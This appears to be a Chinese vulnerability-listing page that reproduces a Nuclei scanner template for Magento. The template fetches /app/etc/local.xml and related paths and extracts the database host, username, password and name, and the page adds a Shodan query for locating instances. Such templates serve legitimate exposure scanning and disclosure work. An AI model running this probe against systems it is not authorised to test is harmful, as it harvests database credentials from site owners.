magento-config-disclosure: Magento Configuration Panel - Detect

日期: 2025-08-01 | 影响软件: Magento | POC: 已公开

漏洞描述

Magento configuration panel was detected. Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml.

PoC代码[已公开]

id: magento-config-disclosure

info:
  name: Magento Configuration Panel - Detect
  author: ptonewreckin,danigoland,geeknik
  severity: high
  description: |
    Magento configuration panel was detected. Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml.
  reference:
    - https://github.com/ptonewreckin/cmsDetector/blob/master/signatures/magento.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-200
    cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    shodan-query: http.component:"Magento"
    product: magento
    vendor: magento
  tags: magento,exposure,credential,config

http:
  - method: GET
    path:
      - "{{BaseURL}}/app/etc/local.xml"
      - "{{BaseURL}}/app/etc/local.xml.additional"
      - "{{BaseURL}}/store/app/etc/local.xml"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "* Magento"
          - "<dbname>"
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 200

    extractors:
      - type: xpath
        part: body
        xpath:
          - "/config/global/resources/default_setup/connection/host"
          - "/config/global/resources/default_setup/connection/username"
          - "/config/global/resources/default_setup/connection/password"
          - "/config/global/resources/default_setup/connection/dbname"
# digest: 4a0a00473045022100d42ed8743ec92ae31d666108fc90debd35380531f5f16d4f9c0c45e4494b625402201e7f20a001514b634348564ea1a3a8388895dcdb61e479b001a8dafe711bcb7e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐